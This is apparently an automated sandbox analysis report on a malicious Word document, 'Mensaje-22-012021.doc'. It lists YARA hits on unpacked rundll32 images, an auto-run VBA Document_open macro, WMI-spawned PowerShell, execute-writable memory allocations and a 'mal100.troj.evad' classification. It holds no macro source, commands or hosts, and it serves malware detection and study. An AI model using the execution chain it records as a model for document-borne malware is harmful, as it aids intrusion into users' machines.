                      Source: Yara matchFile source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5501
                      Source: unknownProcess created: Commandline size = 5400
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5400
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Eeyfocnhd\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100189F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100056B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100106C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100142E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100094EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100199A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100173C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100177C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100193C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100137F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_1000B9B3
                      Source: Mensaje-22-012021.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module M355vvc_qfa, Function Document_open
                      Source: Mensaje-22-012021.docOLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@44/8@4/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$nsaje-22-012021.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB9F.tmpJump to behavior
                      Source: Mensaje-22-012021.docOLE indicator, Word Document stream: true
                      Source: Mensaje-22-012021.docOLE document summary: title field not present or empty
                      Source: Mensaje-22-012021.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ ./......./.....................X...............#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ................H...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......h.|.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................g1.j......................X.............}..v....x.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................g1.j..... X...............X.............}..v............0...............h.|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................1.j......................X.............}..v............0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................1.j....H.|...............X.............}..v....h.......0.................|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................0.j......................X.............}..v.....S......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................0.j..... X...............X.............}..v.....S......0.................|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....0J|...............X.............}..v............0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............G..j....P.................X.............}..v............0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....0J|...............X.............}..v............0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............G..j....P.................X.............}..v............0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....0J|...............X.............}..v............0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............G..j....P.................X.............}..v............0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................F|.....(.......H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............G..j......................X.............}..v.... .......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.7.............}..v....0.......0................F|.....$.......H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....0J|...............X.............}..v....0&......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............G..j.....&................X.............}..v....h'......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............G..j......................X.............}..v....h/......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....0J|...............X.............}..v....06......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............G..j.....6................X.............}..v....h7......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....0J|...............X.............}..v....0>......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............G..j.....>................X.............}..v....h?......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....0J|...............X.............}..v....0F......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............G..j.....F................X.............}..v....hG......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....0J|...............X.............}..v....0N......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............G..j.....N................X.............}..v....hO......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....0J|...............X.............}..v....0V......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............G..j.....V................X.............}..v....hW......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....0J|...............X.............}..v....0^......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............G..j.....^................X.............}..v....h_......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0f......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j.....f................X.............}..v....hg......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0n......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j.....n................X.............}..v....ho......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v.....t......0.......................V.......H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j....8u................X.............}..v.....u......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....`|......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j.....}................X.............}..v.....}......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v............0.......................r.......H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v.... .......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j....0J|...............X.............}..v............0................F|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j....h.................X.............}..v............0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................X.............}..v.... .......0...............H.|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................X.............}..v.....!......0...............H.|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
